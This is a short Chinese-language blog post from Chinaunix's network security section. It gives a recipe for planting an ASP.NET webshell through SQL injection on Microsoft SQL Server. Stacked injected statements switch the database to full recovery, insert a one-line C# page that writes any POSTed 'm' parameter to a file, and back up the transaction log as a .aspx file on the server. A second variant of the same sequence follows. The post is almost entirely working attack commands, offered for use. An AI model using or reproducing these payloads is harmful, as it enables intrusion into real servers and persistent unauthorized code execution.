Chinaunix首页 | 论坛 | 博客
  • 博客访问: 2280609
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-03-06 14:45:06

;alter database pubs set RECOVERY FULL
;create table pubs.dbo.cmd(a image)
;backup log pubs to disk = 'c:\TM' with init
;insert into pubs.dbo.cmd(a) values ('<%@ Page Language="C#" validateRequest="false" %><%System.IO.StreamWriter ow=new System.IO.StreamWriter(Server.MapPath("i.aspx"),false);ow.Write(Request.Params["m"]);ow.Close()%> ')
;backup log pubs to disk = 'd:\haha.aspx'
 
 
这个和asp的一样,客户端post一个变量m把木马代码丢在变量m里面就行了。这个是类似asp的一句话木马的。
网上的asp.net的上传文件程序
;drop table pubs.dbo.cmd
;alter database pubs set RECOVERY FULL
;create table pubs.dbo.cmd(a image)
;backup log pubs to disk = 'c:\TM' with init
;insert into pubs.dbo.cmd(a) values ('
')
;backup log pubs to disk = 'd:\haha2.aspx'
阅读(463) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~